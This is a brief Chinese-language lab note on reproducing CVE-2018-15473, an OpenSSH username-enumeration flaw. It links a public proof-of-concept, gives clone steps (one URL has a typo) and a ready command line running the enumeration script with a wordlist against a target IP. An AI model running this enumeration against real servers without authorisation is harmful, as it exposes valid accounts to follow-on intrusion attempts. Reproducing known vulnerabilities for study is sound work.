CVE-2018-15473(OpenSSH用户枚举漏洞)复现笔记
影响版本
该影响自1999年以来至今年7.7版本中所有版本,远程攻击者可利用漏洞猜测在OpenSSH服务器上注册的用户名
POC链接
https://github.com/1stPeak/CVE-2018-15473
POC环境配置
git clone hhttps://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
注意:如果您在kali上安装,则可以跳过pip安装;paramiko已经存在
Payload
./ssh-username-enum.py -p 51022 -t 10 -w /usr/share/wordlists/metasploit/peak_user.txt 目标IP